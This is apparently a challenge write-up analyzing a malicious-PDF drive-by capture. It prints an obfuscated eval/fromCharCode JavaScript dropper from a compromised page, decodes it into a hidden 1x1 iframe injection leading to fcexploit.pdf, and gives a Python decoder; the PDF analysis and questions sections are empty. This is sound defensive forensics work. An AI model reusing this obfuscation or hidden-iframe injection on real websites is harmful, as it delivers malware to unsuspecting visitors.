
GetPDF


Challenge Link: GetPDF


Scenario:

PDF is the de-facto standard format for exchanging documents online. Such popularity, however, has also attracted cyber criminals, who use it to spread malware to unsuspecting users. The ability to generate malicious PDF files that distribute malware is a functionality built into many exploit kits. As users are less cautious about opening PDF files, the malicious PDF file has become quite a successful attack vector. The network traffic captured in lala.pcap relates to a typical malicious PDF file attack, in which an unsuspecting user opens a compromised web page, which redirects the user’s web browser to the URL of a malicious PDF file. As the PDF plug-in of the browser opens the PDF, the unpatched version of Adobe Acrobat Reader is exploited and, as a result, downloads and silently installs malware on the user’s machine.

As a SOC analyst, analyze the PDF and answer the questions.


Analysis:

Network Traffic Analysis

The challenge file contains a network capture, lala.pcap. It was opened in Wireshark, where HTTP traffic can be seen. Let's check the HTTP requests (Statistics => HTTP => Requests):

HTTP Requests Statistics

All the HTTP requests from the host go to blog.honeynet.org.my, with 6 distinct URL paths.

Let's analyze this network traffic from the start by following the HTTP stream (right-click an HTTP packet => Follow => HTTP Stream) to observe the web requests and responses.

An initial GET request to http://blog.honeynet.org.my/forensic_challenge can be seen; the server responded with a 301 redirect and an HTML page that says “The document has moved” and provides a here hyperlink pointing to http://blog.honeynet.org.my/forensic_challenge/.

HTTP stream 1

On following the here hyperlink to http://blog.honeynet.org.my/forensic_challenge/, the server returns the index HTML page, which contains suspicious, obfuscated JS code.

HTTP stream 2

The beautified version of the above obfuscated JS code is shown below:

```javascript
var DepanNegw = window;
var DexeTelae = -44;
DexeTelae += 45;  // 1 (offset of the second word in each pair)
var XayeZebah = 'nedajemac';
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');  // eval
var ZavevTa = 'fazemezarawaseb';
var MezRai = parseInt;
var DayahDet = 'zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama xeca canapevezejev benaper gezazevaja zeyaxaf wehekeh jecalava set senajaj re kameken bazafakaqewate zaralek yecele kak s hexebeka heha jeyeteg sase wayefewa tey gawewem wefaravavepayeke xedevec gavayedegeqer casehes watenanesajet jelagal payevexebe pejasep heqefagabexemew deheler vejegeca hece rafenadamenaxe jaz fex hekases pazetepajamelew cerasej nevayezabevepeke pex gey dac g dezaleza kekeqebe peyemaf sevanededa cefagey defef cexaqehe sebex galahal zadaxaran lava falamedejegase set law mefe wa mex ces nam j xaxaped gexeqageb feqeled daseze tehadeh zeheteyera xanahef wepahena xarakel gadazecaq tabexape dareq seje lejegagaxavade haf jaz cewe me cag kem fed h legefaz taw keyacah wefereweverewaze rapecame kas fagavev facez yefeley lareke seperene gav lece gahepegesafeve dez gen yeje s waz qas xap c hademax mezezah qepawehe vad zejates pe cehajeg sabebaseqeseda sekesav nebeda cagareg kec fexewel bejewagedegeqene bajesade lav pasepad baraj xecavan vedepe veranake vej heva kejajemacajada wez saj vele x qaj vad fag y qetamefe jaxa kamatare net zeheweh jeme bale cexebedeleneye dab vev kekaxex jetecajek lejekabe qalef bevegeye caxeb beleteqe r hele saxafexazat baz dehakajegeqeneke met mefepexafecebera qwertyu iop asdfghj klzxcvbnmqwer tyuiopa sdfghjklzxcvbnmq hjklzxc vbnmqwer tyu iopasdfghjklzxc vbnmqwe rtyuiopas dfghjkl zxcvbnmqwertyuio pasdfgh jklzxcvbnmqwert yuiopas dfghjk lzxcvbnm qwertyuiop asdfghj klzxcvbnmqwerty uiopasd fghjkl zxcvbnmq werty uio pasdfghjklzxcvb nmqwert yuiopasdfghjklzx cvbnmqwe rty uiopasd fghjklzx uio pasdfghjklzxcvb nmqwert uiopasdfghjklz qwertyui opasdfghjk xcr vbnmqwertyuiopar sdfghjr klzxcvr bnmqwer rtyuiopasdfghjkr lzxcvbnr mqr wertyur iopasr dfghjkr lzxcvbnmqwertyr uiopasdr fghr jklzxcr vbnmqwertr yuiopar sdfr ghjklr zxcvbnmqwertyuir opasdfr ghjr klzxcvr bnmqwertr yuiopar sr dfghjkr lzxcvbnmqwerr dfghjkr lzxcvbnmqwerr tyuiopr asdfgr hjklzxr cvbnmqwertyuior pasdfgr hjklzxcr vbnmqwr ertyur met mefepexafecebera xanahef wepahena feqeled daseze tabexape dareq zexelede l cefagey defef hademax mezezah req batekeqaheteceh zateyene c zekeqay ratevecek veheleqe k dec tec xece jefexazeqayefes cama bapevexeladet keh lanawebasegecaja qefejev qepetekene dacegas relevaj fecasece ber veyayes ba kajebed savaketegemeqe wepecer lamege tere ratavacevejezax gey dasalaje gav yepakekehe'.split(' ');
var ZeJexn = '';
var SerayYafags = String;
var KesXanavn = -50;
KesXanavn += 66;  // 16 (radix used for both toString and parseInt)
var XadHef = 78;
var BeZao = 47;
BeZao += -47;  // 0 (loop start and offset of the first word in each pair)
var FeceSabejo = -46;
FeceSabejo += 48;  // 2 (loop step: one pair of words per character)
var GebJep = 92;
var SeWajec = 'ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD'.replace(/[t9wgBwJW56ixPRs1ZnjHjjKuMkD]/g, '');  // fromCharCode
var MaqTa = 5;
GaDemee = DepanNegw[GaDemee];      // window['eval']
SeWajec = SerayYafags[SeWajec];    // String['fromCharCode']

// Decoding loop: each pair of words encodes one character.
// (word.length - 1) is a hex digit; the first word gives the high nibble,
// the second the low nibble, and the resulting byte is passed to fromCharCode.
for (var YajMedei = BeZao; YajMedei < DayahDet.length - 1; YajMedei += FeceSabejo) {
    ZeJexn += SeWajec(
        MezRai(
            (DayahDet[YajMedei + BeZao].length - 1).toString(KesXanavn) +
            (DayahDet[YajMedei + DexeTelae].length - 1).toString(KesXanavn),
            KesXanavn
        )
    );
}

// Execute the final function
GaDemee(ZeJexn);
```

A for loop constructs the string stored in ZeJexn, and that string is executed at the end of the script via GaDemee(ZeJexn). The loop derives each character from a pair of words: the length of each word minus one is a hex digit, and the two digits together form the character code.

The variable GaDemee resolves to eval, as can be seen below:

```javascript
var GaDemee = 'e5vfqaIVblI5'.replace(/[5fqIVbI5]/g, '');  // eval
```

To obtain the final de-obfuscated string without executing it, GaDemee can be replaced with console.log(), as shown below:

Decoding

When decoded and printed, the payload was found to be:

```javascript
document.write('<iframe scrolling="no" width="1" height="1" border="0" src="http://blog.honeynet.org.my/forensic_challenge/getpdf.php"></iframe>')
```
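The same decoding re-implemented in Python, as an added example that is not part of the original post, so the payload can be recovered without running the attacker's JavaScript at all. The sample input is the first 32 words of the page's DayahDet string, which decode to the opening of the document.write call; the two helper names are assumptions.

```python
import re

# Constructed sample: the first 32 words of the page's DayahDet string,
# enough to decode the opening of the document.write(...) payload.
SAMPLE_WORDS = (
    "zafezed lacet cetexet jevecakemahamaha febenep cafa fezebefe yelaxa "
    "xejarer hejefaqazedeka kebeneh petaqe zevexej jenewabahegehar jabevame "
    "bayap def vasefezetevamer nefelaba sezaxewe qajeqeme wet reyeqer "
    "magemefele xelawece denew jafelev haweqa kel vatabaser mag vejefama"
)


def strip_filler(padded: str, filler: str) -> str:
    """Recover an API name hidden by .replace(/[filler]/g, '') in the script."""
    return re.sub("[" + re.escape(filler) + "]", "", padded)


def decode_word_lengths(blob: str, radix: int = 16, step: int = 2) -> str:
    """Mirror the script's loop without evaluating anything.

    Each pair of words encodes one character: (len(word) - 1) is a hex digit,
    the first word supplies the high nibble and the second the low nibble, and
    parseInt(hi + lo, 16) is passed to String.fromCharCode.
    """
    words = blob.split(" ")
    out = []
    i = 0
    while i < len(words) - 1:          # same bound as the JS for loop
        hi = format(len(words[i]) - 1, "x")        # (length - 1).toString(16)
        lo = format(len(words[i + 1]) - 1, "x")
        out.append(chr(int(hi + lo, radix)))       # parseInt(..., 16) -> chr
        i += step
    return "".join(out)


if __name__ == "__main__":
    print(strip_filler("e5vfqaIVblI5", "5fqIVbI5"))                      # eval
    print(strip_filler("ftr9wogmBwJCW5h6aixrPRCs1ZonjHjdjKueMkD",
                       "t9wgBwJW56ixPRs1ZnjHjjKuMkD"))                   # fromCharCode
    print(decode_word_lengths(SAMPLE_WORDS))                             # document.write('
```

Feeding the full DayahDet string to decode_word_lengths() yields the complete iframe payload shown above.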

The injected iframe requests http://blog.honeynet.org.my/forensic_challenge/getpdf.php, a script that runs on the remote server.

This can also be verified in the network capture in Wireshark, as shown below. The server then responded with a redirect to http://blog.honeynet.org.my/forensic_challenge/fcexploit.pdf.

HTTP Stream 3

Let's now export this PDF, fcexploit.pdf, from the network capture using Wireshark (File => Export Objects => HTTP) for further analysis.


PDF Analysis


Questions:



This post is licensed under CC BY 4.0 by the author.
